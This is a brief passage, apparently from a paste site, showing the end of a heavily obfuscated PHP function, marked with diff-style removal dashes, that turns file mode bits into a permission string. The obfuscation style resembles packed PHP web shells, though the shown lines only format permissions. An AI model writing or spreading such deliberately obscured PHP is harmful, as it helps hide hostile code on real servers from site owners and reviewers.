- $hybyysyp = "perms";
- ${${"GLOBALS"}["dmvfhxchs"]} .= ((${${"GLOBALS"}["snucwrjx"]} & 0x0004) ? "r" : "-");
- ${$budbfbkwgim} .= ((${${"GLOBALS"}["niqosh"]} & 0x0002) ? "w" : "-");
- ${${"GLOBALS"}["wrrdfeiqpw"]} .= ((${$hybyysyp} & 0x0001) ? ((${$ydjzbkyoavu} & 0x0200) ? "t" : "x") : ((${${"GLOBALS"}["snucwrjx"]} & 0x0200) ? "T" : "-"));
- return ${${"GLOBALS"}["wrrdfeiqpw"]};
- } ?>
Add Comment
Please, Sign In to add comment